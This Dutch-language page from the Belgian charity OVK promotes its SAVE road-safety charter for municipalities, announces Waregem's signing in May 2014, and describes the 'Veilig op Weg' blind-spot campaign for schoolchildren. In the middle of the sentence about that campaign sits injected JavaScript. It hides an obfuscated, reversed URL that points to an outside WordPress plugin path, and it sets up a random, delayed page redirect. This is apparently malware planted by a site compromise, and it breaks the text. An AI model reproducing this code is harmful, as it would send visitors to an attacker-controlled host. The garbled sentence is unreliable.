Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Waregem ondertekent SAVE-charter

Op maandag 12 mei 2014 omstreeks 10u zal het stadsbestuur van Waregem het SAVE-charter Steden & Gemeenten officieel ondertekenen. Waregem wordt hiermee de 26ste Vlaamse Gemeente die via het SAVE-charter zal streven naar een grotere verkeersveiligheid.

De ondertekening vindt plaats in het stadhuis van Waregem, meerbeplaald in de Briek Schottezaal, gelegen op het Gemeenteplein 2 te Waregem. Op de dag van de ondertekening neemt de Stad ook deel aan de veiligheidscampagne “Veilig op weg”. Veilig op Weg is een verkeersveiligheidscampagne die zich toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toelegt op de dode hoek problematiek.

Het unieke van het project is dat het de transporteurs zelf zijn, die de lessen op vrijwillige basis geven. De campagne zelf wordt gecoördineerd door Transport en Logistiek Vlaanderen, beroepsvereniging van ondernemingen in transport en logistiek. Transport en Logistiek Vlaanderen bereikte in 2001 een akkoord met haar zusterorganisatie Transport en Logistiek Nederland, om het project ‘Veilig op Weg’ naar Vlaanderen te halen. Tijdens de eerste twaalf schooljaren van de campagne (2001-2013) werden 1.205 lagere scholen bezocht, waarbij 100.205 kinderen les kregen.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be